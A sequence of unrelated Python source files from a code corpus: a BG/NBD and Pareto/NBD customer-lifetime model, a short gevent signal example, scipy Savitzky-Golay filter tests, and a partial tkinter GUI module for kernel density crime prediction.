the Pareto/NBD Model' (Fader, Hardie and Lee 2005) http://brucehardie.com/papers/018/fader_et_al_mksc_05.pdf and
accompanying technical note http://www.brucehardie.com/notes/004/
Apache 2 License
"""
from math import log, exp, sqrt
import numpy as np
import pandas as pd
import pickle
import datetime
from scipy.optimize import minimize
from scipy.special import gammaln
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
from lifetimes import BetaGeoFitter
from lifetimes import ModifiedBetaGeoFitter
from lifetimes import ParetoNBDFitter
# from lifetimes import BetaGeoBetaBinomFitter
from convert_df import split_test_df_by_pred_period, txt_to_df, df_transform, train_test_split
__author__ = '<NAME>'
'''
To do:
- Change input format
- Add conditional expectation
- Convert functions to a class
'''
class BgNbd(object):
'''
class for creating BG/ NBD for non contractual transactions,
takes a csv file as input with the following columns: customer ID, number of transactions x, time of last transaction, time customer could make a repeated transaction (T)
'''
def __init__(self, train_df, first_purch_weeks=25, train_weeks=52, max_iter=150):
self.train_weeks = train_weeks
self.train_df = train_df.reset_index()
self.first_purch_weeks = first_purch_weeks
self.max_iter = max_iter
def log_likelihood_individual(self, r, alpha, a, b, x, tx, t):
"""Log of the likelihood function for a given randomly chosen individual with purchase history = (x, tx, t) where
x is the number of transactions in time period (0, t] and tx (0 < tx <= t) is the time of the last transaction - sheet BGNBD Estimation"""
ln_a1 = gammaln(r + x) - gammaln(r) + r * log(alpha)
ln_a2 = gammaln(a + b) + gammaln(b + x) - gammaln(b) - gammaln(a + b + x)
ln_a3 = -(r + x) * log(alpha + t)
a4 = 0
if x > 0:
a4 = exp(log(a) - log(b + x - 1) - (r + x) * log(alpha + tx))
return ln_a1 + ln_a2 + log(exp(ln_a3) + a4)
def log_likelihood(self, r, alpha, a, b, train_df):
"""Returns sum of the individual log likelihoods
equal to cell B5 in sheet BGNBD Estimation"""
# can't put constraints on n-m minimizer so fake them here
if r <= 0 or alpha <= 0 or a <= 0 or b <= 0:
return -np.inf
train_df['ll'] = train_df.apply(lambda row: self.log_likelihood_individual(r, alpha, a, b, row['frequency'], row['recency'], row['T']), axis=1)
return train_df.ll.sum()
def maximize(self, train_df):
'''Minimize (negative of maximizing) the log_likelihood function,
i.e. change r, alpha, a and b so that the sum of indiviual log likelihoods is maximized'''
negative_ll = lambda params: -self.log_likelihood(*params, train_df=train_df)
params0 = np.array([1., 1., 1., 1.])
res = minimize(negative_ll, params0, method='nelder-mead', options={'xtol': 1e-4})
return res
def lifetimes_fit(self, train_df, penalizer_coef=0.0):
'''
fit but then using lifetimes library --> faster
'''
bgf = BetaGeoFitter(penalizer_coef=penalizer_coef)
data = train_df
bgf.fit(data['frequency'], data['recency'], data['T'])
params = bgf.params_
self.r = params['r']
self.alpha = params['alpha']
self.a = params['a']
self.b = params['b']
return params
def modified_fit(self, train_df, penalizer_coef=0.0):
'''
Modified BetaGeometric NBD model from lifetimes
'''
mbgf = ModifiedBetaGeoFitter(penalizer_coef=penalizer_coef)
mbgf.fit(train_df['frequency'], train_df['recency'], train_df['T'])
params = mbgf.params_
self.r = params['r']
self.alpha = params['alpha']
self.a = params['a']
self.b = params['b']
return params
def pareto_fit(self, train_df, penalizer_coef=0.0):
'''
The difference between the models is that the BG/BB is used to describe situations in which customers have discrete transaction opportunities, rather than being able to make transactions at any time
'''
pareto = ParetoNBDFitter()
data = train_df
pareto.fit(data['frequency'], data['recency'], data['T'])
params = pareto.params_
self.r = params['r']
self.alpha = params['alpha']
self.s = params['s']
self.beta = params['beta']
return params
def _negative_log_likelihood(self, params, freq, rec, T, penalizer_coef):
if np.any(np.asarray(params) <= 0.):
return np.inf
r, alpha, s, beta = params
x = freq
r_s_x = r + s + x
A_1 = gammaln(r + x) - gammaln(r) + r * log(alpha) + s * log(beta)
log_A_0 = ParetoNBDFitter._log_A_0(params, freq, rec, T)
A_2 = np.logaddexp(-(r + x) * log(alpha + T) - s * log(beta + T), log(s) + log_A_0 - log(r_s_x))
penalizer_term = penalizer_coef * sum(np.asarray(params) ** 2)
return -(A_1 + A_2).mean() + penalizer_term
def pareto_conditional_expected_number_of_purchases_up_to_time(self, pred_weeks, frequency, recency, T):
"""
Calculate the expected number of repeat purchases up to time t for a randomly choose individual from
the population, given they have purchase history (frequency, recency, T)
Parameters:
t: a scalar or array of times.
frequency: a scalar: historical frequency of customer.
recency: a scalar: historical recency of customer.
T: a scalar: age of the customer.
Returns: a scalar or array
"""
x, t_x = frequency, recency
params = self.r, self.alpha, self.s, self.beta
r, alpha, s, beta = self.r, self.alpha, self.s, self.beta
likelihood = -self._negative_log_likelihood(params, x, t_x, T, 0)
first_term = gammaln(r + x) - gammaln(r) + r*log(alpha) + s*log(beta) - (r + x)*log(alpha + T) - s*log(beta + T)
second_term = log(r + x) + log(beta + T) - log(alpha + T)
third_term = log((1 - ((beta + T) / (beta + T + pred_weeks)) ** (s - 1))/(s - 1))
return exp(first_term + second_term + third_term - likelihood)
def pareto_total_conditional_prediction(self, pred_weeks):
'''
Make a single prediction for all train_df and return sum over a specific period of time
returns a matrix of expected sales by customer and the total sales prediction
'''
self.train_df['pred'] = 0.
self.train_df['actual'] = 0.
pred_df = self.train_df[['customer_id', 'pred', 'actual']]
self.pred_actual_matrix = pred_df.as_matrix()
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.pareto_conditional_expected_number_of_purchases_up_to_time(pred_weeks, x, recency, T)
self.pred_actual_matrix[i][1] = pred
total_freq += pred
return self.pred_actual_matrix, total_freq
def pareto_pred_and_actuals_matrix(self, test_df, pred_weeks):
'''
Adds column of actual values next to predicted values
'''
self.pred_actual_matrix, total_freq = self.pareto_total_conditional_prediction(pred_weeks)
# add column of zeros to pred_matrix, fill in with actual values
test_dict = split_test_df_by_pred_period(test_df, pred_weeks)
for i in xrange(self.pred_actual_matrix.shape[0]):
self.pred_actual_matrix[i][2] = test_dict.get(self.pred_actual_matrix[i][0], 0)
return self.pred_actual_matrix
def fit(self, train_df):
res = self.maximize(train_df)
if res.status != 0:
raise Exception(res.message)
self.r, self.alpha, self.a, self.b = res.x
return self.r, self.alpha, self.a, self.b
def params_(self):
return 'r: {}, alpha: {}, a: {}, b: {}'.format(self.r, self.alpha, self.a, self.b)
def create_ext_df(self, max_iter=150):
'''
- EXt = the expected number of transactions for a randomly-chosen individual in a time period of length t given r, alpha, a and b
- returns df with the gaussian hypergeometric cost function for every day
Iterates untill uj is close to 0 or maximum iterations is reached
'''
# self.r, self.alpha, self.a, self.b = 0.243, 4.414, 0.793, 2.426
total_weeks = self.train_weeks + self.pred_weeks
ext_df = pd.DataFrame(0, index=range(0, total_weeks), columns=['t', 'ext', '2F1', 'z'])
ext_df['t'] = ext_df.apply(lambda x: x +1/7.).cumsum()
ext_df['z'] = ext_df.t.apply(lambda x: x/ float(self.alpha + x))
ext_df['2F1'] = ext_df.z.apply(lambda row: self.gaussian_hypergeometric(row, max_iter))
ext_df['ext'] = ext_df.apply(lambda row: (self.a + self.b - 1)/ (self.a - 1) * (1 - (self.alpha/ (self.alpha + row['t'])) **self.r * row['2F1']), axis=1)
return ext_df
def gaussian_hypergeometric(self, row_z, max_iter):
'''used for to calculate gaussian hypergeometric cost function, for every day, see lambda function 2F1'''
gaus_cost = 1
uj = 1
for i in range(max_iter):
u_new = uj * row_z * (self.r + i) * (self.b + i)/ ((self.a + self.b - 1 + i) * (i + 1))
gaus_cost += u_new
uj = u_new
return gaus_cost
def first_purchase_count_id(self):
'''
Counts the number of transactions per customer ID.
'''
self.train_df['first_purch'] = self.train_df.apply(lambda row: self.train_weeks - row['T'], axis = 1)
first_purch_cnt = self.train_df.groupby('first_purch')['customer_id'].count().reset_index(name="cnt")
first_purch_cnt.first_purch = first_purch_cnt.first_purch.round(2)
first_purch_df = pd.DataFrame(0, index=range(0, self.first_purch_weeks * 7), columns=['first_purch'])
first_purch_df['first_purch'] = first_purch_df.apply(lambda x: x +1/7.).cumsum().round(2)
return first_purch_df.set_index('first_purch').join(first_purch_cnt.set_index('first_purch')).fillna(0).reset_index()
def cummulative_repeated_sales(self, cum_weeks=10):
'''
Creates a forecast of repeat purchasing by calculating the expected number of weekly repeat transactions (cummulative)'''
ext_df = self.create_ext_df()
n_s = self.first_purchase_count_id()
cum_rpt_sls = 0
i_ext = cum_weeks * 7 - 2
for i in xrange(cum_weeks * 7 - 1):
cum_rpt_sls += ext_df['ext'][i_ext] * n_s['cnt'][i]
i_ext -= 1
return cum_rpt_sls
def single_conditional_prediction(self, ID, x, recency, T, pred_weeks=''):
'''
For a randomly-chosen individual, computes the expected number of transactions in a time period of length t (pred_weeks) is
Predicts a particular customer`s future purchasing, given information about his past behavior and the parameter estimates of the four models.
'''
self.max_iter = 150
if pred_weeks == '':
pred_weeks = self.pred_weeks
a_id = self.r + x
b_id = self.b + x
c_id = self.a + self.b + x - 1
z_id = pred_weeks/ (self.alpha + T + pred_weeks)
gaus_cost = 1 # == 2F1 in paper
uj = 1
for i in xrange(1, self.max_iter):
u_new = uj * (a_id + i - 1) * (b_id + i - 1)/ ((c_id + i - 1) * i) * z_id
gaus_cost += u_new
uj = u_new
return (self.a + self.b + x - 1)/ (self.a - 1) * (1 - ((self.alpha + T) / (self.alpha + T + pred_weeks)) ** (self.r + x) * gaus_cost)/ (1 + (x > 0) * self.a / (self.b + x - 1) * ((self.alpha + T)/ (self.alpha + recency)) ** (self.r + x))
def total_conditional_prediction(self, pred_weeks=''):
'''
Make a single prediction for all train_df and return sum over a specific period of time
returns a matrix of expected sales by customer and the total sales prediction
'''
if pred_weeks == '':
pred_weeks = self.pred_weeks
self.train_df['pred'] = 0.
self.train_df['actual'] = 0.
pred_df = self.train_df[['customer_id', 'pred', 'actual']]
self.pred_actual_matrix = pred_df.as_matrix()
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.single_conditional_prediction(ID, x, recency, T , pred_weeks)
self.pred_actual_matrix[i][1] = pred
total_freq += pred
return self.pred_actual_matrix, total_freq
def conditional_prediction_total_freq_only(self, pred_weeks):
'''
Similar than total_conditional_prediction but excludes making a matrix > faster
Use this function for total_prediction_over_time
'''
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.single_conditional_prediction(ID, x, recency, T , pred_weeks)
total_freq += pred
return total_freq
def total_prediction_over_time(self, test_df, total_pred_weeks=39):
'''
Create dataframe from test, with a row for every day and create a cumsum for the num of transactions
loop over every day and get the total_freq from total_conditional_prediction(), and append to dataframe
'''
# cut off transactions that are outside the prediction period
test_df = test_df[test_df['test_weeks'] <= total_pred_weeks]
# filter on same customer ids as used in the train_df. Group by date to get the num of transactions per date
test_df = test_df[test_df.customer_id.isin(self.train_df['customer_id'].tolist())]
# create empty df to fill in the results
columns = ['act_cumsum', 'pred_x', 'pred_cumsum']
index = np.linspace(1/float(7), total_pred_weeks, total_pred_weeks*7)
pred_by_day_df = pd.DataFrame(index=index, columns=columns)
pred_by_day_df = pred_by_day_df.fillna(0.) # with floats 0s rather than NaNs
pred_by_day_df = pred_by_day_df.join(test_df.groupby('test_weeks')['cnt_trans'].sum())
pred_by_day_df = pred_by_day_df.rename(columns={'cnt_trans': 'acrecency'})
pred_by_day_df.acrecency = pred_by_day_df.acrecency.fillna(0)
pred_by_day_df['act_cumsum'] = pred_by_day_df.acrecency.cumsum()
pred_by_day_df = pred_by_day_df.reset_index()
pred_by_day_df['pred_x'] = pred_by_day_df['index'].apply(lambda row: self.conditional_prediction_total_freq_only( pred_weeks=row))
pred_by_day_df['pred_cumsum'] = pred_by_day_df.pred_x.cumsum()
pred_by_day_df['perc_similar'] = pred_by_day_df['pred_cumsum'] / pred_by_day_df[ 'act_cumsum']
return pred_by_day_df
def pred_and_actuals_matrix(self, test_df, pred_weeks):
'''
Adds column of actual values next to predicted values
'''
if pred_weeks == '':
pred_weeks = self.pred_weeks
self.pred_actual_matrix, total_freq = self.total_conditional_prediction(pred_weeks)
# add column of zeros to pred_matrix, fill in with actual values
test_dict = split_test_df_by_pred_period(test_df, pred_weeks)
for i in xrange(self.pred_actual_matrix.shape[0]):
self.pred_actual_matrix[i][2] = test_dict.get(self.pred_actual_matrix[i][0], 0)
return self.pred_actual_matrix
def r2(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return r2_score(y_true, y_pred)
def rmse(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return sqrt(mean_squared_error(y_true, y_pred))
def mean_absolute_error(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return mean_absolute_error(y_true, y_pred)
def rmsle(self):
'''
it basically acts as a % incorrect so it scales with parameter values
'''
y_true = self.pred_actual_matrix[:, 2].astype(float)
y_pred = self.pred_actual_matrix[:, 1].astype(float)
return np.sqrt(np.square(np.log(y_pred + 1) - np.log(y_true + 1)).mean())
if __name__ == '__main__':
main()
# '''Sample data consist of train_df who made their first transaction in week 0 to 12, we have info on their repeat purchasing behavior up to the week 39 and make predictions up to week 78'''
# df = pd.read_csv('../data/test.csv', sep='\t')
# df = pd.read_csv('../data/test/train_df_test.csv', sep='\t')
# print df.head()
# print 'r: {}, alpha: {}, a: {}, b: {}'.format(r, alpha, a, b)
# loaded_model = pickle.load(open(filename, 'rb'))
# result = loaded_model.total_conditional_prediction(pred_weeks=10)
# pred_matrix, total_freq = loaded_model.total_conditional_prediction(train_df)
# r2_result = loaded_model.r2(test_df)
# print bgnbd.total_conditional_prediction(pred_weeks=12, max_iter=2)
# print lifetimes_fit(train_df)
# check '381568065'
|
StarcoderdataPython
|
3311196
|
<reponame>viniciusfeitosa/basic-gevent-tutorial
import gevent
import signal
def run_forever():
gevent.sleep(1000)
if __name__ == '__main__':
gevent.signal(signal.SIGQUIT, gevent.kill)
thread = gevent.spawn(run_forever)
thread.join()
|
StarcoderdataPython
|
6626290
|
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_allclose, assert_equal,
assert_almost_equal, assert_array_equal,
assert_array_almost_equal)
from scipy.ndimage import convolve1d
from scipy.signal import savgol_coeffs, savgol_filter
from scipy.signal._savitzky_golay import _polyder
def check_polyder(p, m, expected):
dp = _polyder(p, m)
assert_array_equal(dp, expected)
def test_polyder():
cases = [
([5], 0, [5]),
([5], 1, [0]),
([3, 2, 1], 0, [3, 2, 1]),
([3, 2, 1], 1, [6, 2]),
([3, 2, 1], 2, [6]),
([3, 2, 1], 3, [0]),
([[3, 2, 1], [5, 6, 7]], 0, [[3, 2, 1], [5, 6, 7]]),
([[3, 2, 1], [5, 6, 7]], 1, [[6, 2], [10, 6]]),
([[3, 2, 1], [5, 6, 7]], 2, [[6], [10]]),
([[3, 2, 1], [5, 6, 7]], 3, [[0], [0]]),
]
for p, m, expected in cases:
check_polyder(np.array(p).T, m, np.array(expected).T)
#--------------------------------------------------------------------
# savgol_coeffs tests
#--------------------------------------------------------------------
def alt_sg_coeffs(window_length, polyorder, pos):
"""This is an alternative implementation of the SG coefficients.
It uses numpy.polyfit and numpy.polyval. The results should be
equivalent to those of savgol_coeffs(), but this implementation
is slower.
window_length should be odd.
"""
if pos is None:
pos = window_length // 2
t = np.arange(window_length)
unit = (t == pos).astype(int)
h = np.polyval(np.polyfit(t, unit, polyorder), t)
return h
def test_sg_coeffs_trivial():
# Test a trivial case of savgol_coeffs: polyorder = window_length - 1
h = savgol_coeffs(1, 0)
assert_allclose(h, [1])
h = savgol_coeffs(3, 2)
assert_allclose(h, [0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4)
assert_allclose(h, [0, 0, 1, 0, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1)
assert_allclose(h, [0, 0, 0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1, use='dot')
assert_allclose(h, [0, 1, 0, 0, 0], atol=1e-10)
def compare_coeffs_to_alt(window_length, order):
# For the given window_length and order, compare the results
# of savgol_coeffs and alt_sg_coeffs for pos from 0 to window_length - 1.
# Also include pos=None.
for pos in [None] + list(range(window_length)):
h1 = savgol_coeffs(window_length, order, pos=pos, use='dot')
h2 = alt_sg_coeffs(window_length, order, pos=pos)
assert_allclose(h1, h2, atol=1e-10,
err_msg=("window_length = %d, order = %d, pos = %s" %
(window_length, order, pos)))
def test_sg_coeffs_compare():
# Compare savgol_coeffs() to alt_sg_coeffs().
for window_length in range(1, 8, 2):
for order in range(window_length):
compare_coeffs_to_alt(window_length, order)
def test_sg_coeffs_exact():
polyorder = 4
window_length = 9
halflen = window_length // 2
x = np.linspace(0, 21, 43)
delta = x[1] - x[0]
# The data is a cubic polynomial. We'll use an order 4
# SG filter, so the filtered values should equal the input data
# (except within half window_length of the edges).
y = 0.5 * x ** 3 - x
h = savgol_coeffs(window_length, polyorder)
y0 = convolve1d(y, h)
assert_allclose(y0[halflen:-halflen], y[halflen:-halflen])
# Check the same input, but use deriv=1. dy is the exact result.
dy = 1.5 * x ** 2 - 1
h = savgol_coeffs(window_length, polyorder, deriv=1, delta=delta)
y1 = convolve1d(y, h)
assert_allclose(y1[halflen:-halflen], dy[halflen:-halflen])
# Check the same input, but use deriv=2. d2y is the exact result.
d2y = 3.0 * x
h = savgol_coeffs(window_length, polyorder, deriv=2, delta=delta)
y2 = convolve1d(y, h)
assert_allclose(y2[halflen:-halflen], d2y[halflen:-halflen])
def test_sg_coeffs_deriv():
# The data in `x` is a sampled parabola, so using savgol_coeffs with an
# order 2 or higher polynomial should give exact results.
i = np.array([-2.0, 0.0, 2.0, 4.0, 6.0])
x = i ** 2 / 4
dx = i / 2
d2x = 0.5 * np.ones_like(i)
for pos in range(x.size):
coeffs0 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot')
assert_allclose(coeffs0.dot(x), x[pos], atol=1e-10)
coeffs1 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=1)
assert_allclose(coeffs1.dot(x), dx[pos], atol=1e-10)
coeffs2 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=2)
assert_allclose(coeffs2.dot(x), d2x[pos], atol=1e-10)
def test_sg_coeffs_large():
# Test that for large values of window_length and polyorder the array of
# coefficients returned is symmetric. The aim is to ensure that
# no potential numeric overflow occurs.
coeffs0 = savgol_coeffs(31, 9)
assert_array_almost_equal(coeffs0, coeffs0[::-1])
coeffs1 = savgol_coeffs(31, 9, deriv=1)
assert_array_almost_equal(coeffs1, -coeffs1[::-1])
#--------------------------------------------------------------------
# savgol_filter tests
#--------------------------------------------------------------------
def test_sg_filter_trivial():
""" Test some trivial edge cases for savgol_filter()."""
x = np.array([1.0])
y = savgol_filter(x, 1, 0)
assert_equal(y, [1.0])
# Input is a single value. With a window length of 3 and polyorder 1,
# the value in y is from the straight-line fit of (-1,0), (0,3) and
# (1, 0) at 0. This is just the average of the three values, hence 1.0.
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_almost_equal(y, [1.0], decimal=15)
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='nearest')
assert_almost_equal(y, [3.0], decimal=15)
x = np.array([1.0] * 3)
y = savgol_filter(x, 3, 1, mode='wrap')
assert_almost_equal(y, [1.0, 1.0, 1.0], decimal=15)
def test_sg_filter_basic():
# Some basic test cases for savgol_filter().
x = np.array([1.0, 2.0, 1.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, [1.0, 4.0 / 3, 1.0])
y = savgol_filter(x, 3, 1, mode='mirror')
assert_allclose(y, [5.0 / 3, 4.0 / 3, 5.0 / 3])
y = savgol_filter(x, 3, 1, mode='wrap')
assert_allclose(y, [4.0 / 3, 4.0 / 3, 4.0 / 3])
def test_sg_filter_2d():
x = np.array([[1.0, 2.0, 1.0],
[2.0, 4.0, 2.0]])
expected = np.array([[1.0, 4.0 / 3, 1.0],
[2.0, 8.0 / 3, 2.0]])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, expected)
y = savgol_filter(x.T, 3, 1, mode='constant', axis=0)
assert_allclose(y, expected.T)
def test_sg_filter_interp_edges():
# Another test with low degree polynomial data, for which we can easily
# give the exact results. In this test, we use mode='interp', so
# savgol_filter should match the exact solution for the entire data set,
# including the edges.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
# Polynomial test data.
x = np.array([t,
3 * t ** 2,
t ** 3 - t])
dx = np.array([np.ones_like(t),
6 * t,
3 * t ** 2 - 1.0])
d2x = np.array([np.zeros_like(t),
6 * np.ones_like(t),
6 * t])
window_length = 7
y = savgol_filter(x, window_length, 3, axis=-1, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
# Transpose everything, and test again with axis=0.
x = x.T
dx = dx.T
d2x = d2x.T
y = savgol_filter(x, window_length, 3, axis=0, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
def test_sg_filter_interp_edges_3d():
# Test mode='interp' with a 3-D array.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
x1 = np.array([t, -t])
x2 = np.array([t ** 2, 3 * t ** 2 + 5])
x3 = np.array([t ** 3, 2 * t ** 3 + t ** 2 - 0.5 * t])
dx1 = np.array([np.ones_like(t), -np.ones_like(t)])
dx2 = np.array([2 * t, 6 * t])
dx3 = np.array([3 * t ** 2, 6 * t ** 2 + 2 * t - 0.5])
# z has shape (3, 2, 21)
z = np.array([x1, x2, x3])
dz = np.array([dx1, dx2, dx3])
y = savgol_filter(z, 7, 3, axis=-1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=-1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (3, 21, 2)
z = np.array([x1.T, x2.T, x3.T])
dz = np.array([dx1.T, dx2.T, dx3.T])
y = savgol_filter(z, 7, 3, axis=1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (21, 3, 2)
z = z.swapaxes(0, 1).copy()
dz = dz.swapaxes(0, 1).copy()
y = savgol_filter(z, 7, 3, axis=0, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=0, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
|
StarcoderdataPython
|
6448875
|
<reponame>sumau/PredictCode
"""
kde
~~~
A variety of "other" KDE methods, not drawn directly from the literature.
"""
from . import predictor
import open_cp.predictors
import tkinter as tk
import tkinter.ttk as ttk
import open_cp.kde
import open_cp.gui.tk.util as util
import open_cp.gui.tk.richtext as richtext
import open_cp.gui.tk.tooltips as tooltips
import open_cp.gui.tk.mtp as mtp
import enum
import numpy as np
_text = {
"main" : ("Other Kernel Density Estimation methods\n\n"
+ "A selection of other KDE (kernel density estimation) methods; to be compared with "
+ "the 'Scipy KDE naive estimator' (we here offer more options) or the 'Retrospective' and "
+ "'Prospective' hotspotting algorithms (which are explicitly explained in the scientific "
+ "literature, whereas the methods here are not).\n"
+ "We offer two ways to customise the algorithm: the choice of the KDE algorithm to be "
+ "applied to the spacial coordinates (estimating a continuous risk profile from the location "
+ "of events) and how (or not) to weight time.\n\n"
+ "Training Data usage: Can either be ignored, or directly used."
),
"no_data" : "No data points found in time range: have enough crime types been selected?",
"sk" : "Space kernel: ",
"sktt" : "How the spatial locations of points are converted to a continuous risk profile",
"sks" : "Space kernel settings",
"skernals" : ["Scipy KDE", "Nearest neighbour variable bandwidth"],
"tk" : "Treatment of timestamps: ",
"tktt" : "How we should treat timestamps",
"tks" : "Timestamp adjustment settings",
"tchoices" : ["Training data only", "All time in window", "Exponential decay", "Quadratic decay"],
"scipy_main" : "Uses the SciPY builtin Gaussian KDE method. This is thus like the 'naive' predictor, but with improved control over the usage of time information.",
"nkde_main" : "Uses a variable bandwidth `k`th nearest neighbour Gaussian KDE. Tends to identify clusters better.",
"nkde_k" : "Which nearest neighbour to use:",
"nkde_k_tt" : "The bandwidth for the contribution to a kernel at a point is chosen by looking at the distance from the point to this nearest neighbour. Larger values lead to a 'smoother' kernel. Values in the range 15 to 100 are common.",
"to_main" : "Only use the training date range of data to compute the kernel. All points are treated equally. Probably of mostly academic interest.",
"wi_main" : "Use all data in a window of time before the prediction date. All points are treated equally.",
"wi_days" : "Days in window: ",
"wi_days_tt" : "The time window will be this many days in length",
"ex_main" : "The weighting given to points decays exponentially in the time between the event occurring and the prediction date.",
"ex_scale" : "Scale in days: ",
"ex_scale_tt" : "The 'scale' of the exponential, which is the time period over which the intensity falls to about 37% of the base intensity.",
"qu_main" : "The weighting given to points decays exponentially in the time between the event occurring and the prediction date.",
"qu_scale" : "Scale in days: ",
"qu_scale_tt" : "The 'scale' of the decay. The larger this value, the longer in time it takes for events to have less intensity. See the graph for the effect.",
"days" : "Days",
"int" : "Relative weighting",
"kdeplot" : "Preview of the selected KDE method, as applied to the entire data-set, assuming a valid coordinate projector is selected. No timestamp adjustment is made.",
}
class KDE(predictor.Predictor):
def __init__(self, model):
super().__init__(model)
self.space_kernel = 0
self._sk_model = [ScipyKDE(self), NeatestKDE(self)]
self.time_kernel = 0
self._tk_model = [TrainOnly(), Window(), ExpDecay(), QuadDecay()]
@staticmethod
def describe():
return "Kernel density estimation predictor"
@staticmethod
def order():
return predictor._TYPE_GRID_PREDICTOR
def make_view(self, parent):
return KDEView(parent, self)
@property
def name(self):
return "KDE predictor ({},{})".format(self.space_kernel.name,
self.time_kernel.name)
@property
def settings_string(self):
out = [self.space_kernel_model.settings_string, self.time_kernel_model.settings_string]
out = [x for x in out if x != ""]
return ", ".join(out)
def to_dict(self):
data = {"space_kernel" : self.space_kernel.value}
data["space_models"] = { model.name : model.to_dict() for model in self._sk_model }
data["time_models"] = { model.name : model.to_dict() for model in self._tk_model }
return data
def from_dict(self, data):
self.space_kernel = int(data["space_kernel"])
for name, d in data["space_models"].items():
for model in self._sk_model:
if model.name == name:
model.from_dict(d)
for name, d in data["time_models"].items():
for model in self._tk_model:
if model.name == name:
model.from_dict(d)
def make_tasks(self):
return [self.Task(self)]
class Task(predictor.GridPredictorTask):
def __init__(self, parent):
super().__init__()
self._kde = parent
def __call__(self, analysis_model, grid_task, project_task):
timed_points = self.projected_data(analysis_model, project_task)
if timed_points.number_data_points == 0:
raise predictor.PredictionError(_text["no_data"])
grid = grid_task(timed_points)
train_start, train_end, _, _ = analysis_model.time_range
time_task = self._kde.time_kernel_model.select_data_task(train_start, train_end)
time_kernel = self._kde.time_kernel_model.make_kernel()
space_kernel_provider = self._kde.space_kernel_model.make_kernel()
return KDE.SubTask(timed_points, grid, time_task, time_kernel,
space_kernel_provider)
class SubTask(predictor.SingleGridPredictor):
def __init__(self, timed_points, grid, time_task, time_kernel,
space_kernel_provider):
super().__init__()
self._timed_points = timed_points
self._time_task = time_task
self._grid = grid
self._time_kernel = time_kernel
self._space_kernel_provider = space_kernel_provider
def __call__(self, predict_time, length=None):
start_time, end_time, time_unit = self._time_task(predict_time)
predictor = open_cp.kde.KDE(grid=self._grid)
predictor.data = self._timed_points
predictor.time_unit = time_unit
predictor.time_kernel = self._time_kernel
predictor.space_kernel = self._space_kernel_provider
return predictor.predict(start_time = start_time, end_time = end_time)
def config(self):
return {"resize": True}
def test_coords(self):
return self._projected_coords()
class SpaceKernel(enum.Enum):
scipy = 0
nearest = 1
@property
def space_kernel(self):
return self._space_kernel
@space_kernel.setter
def space_kernel(self, value):
self._space_kernel = self.SpaceKernel(value)
@property
def space_kernel_model(self):
return self._sk_model[self.space_kernel.value]
class TimeKernel(enum.Enum):
training = 0
window = 1
exponential = 2
quadratic = 3
@property
def time_kernel(self):
return self._time_kernel
@time_kernel.setter
def time_kernel(self, value):
self._time_kernel = self.TimeKernel(value)
@property
def time_kernel_model(self):
return self._tk_model[self.time_kernel.value]
class BaseKDEView():
def find_min_max(self, coords):
xmin, xmax = np.min(coords), np.max(coords)
xd = xmax - xmin
return xmin - xd / 20, xmax + xd / 20
def sample_kernel(self, kernel_provider, data, ax):
data = np.asarray(data)
kernel = kernel_provider(data)
xmin, xmax = self.find_min_max(data[0])
xs = np.linspace(xmin, xmax, 100)
ymin, ymax = self.find_min_max(data[1])
ys = np.linspace(ymin, ymax, 100)
matrix = np.empty((100,100))
for yi, y in enumerate(ys):
matrix[yi,:] = kernel([xs, np.asarray([y] * len(xs))])
ax.pcolormesh(xs, ys, matrix)
def make_plot_task(self, kernel_provider, coords):
def task():
fig = mtp.new_figure((6,6))
ax = fig.add_subplot(1,1,1)
xcs, ycs = coords
self.sample_kernel(kernel_provider, [xcs, ycs], ax)
ax.set_aspect(1)
fig.set_tight_layout("tight")
return fig
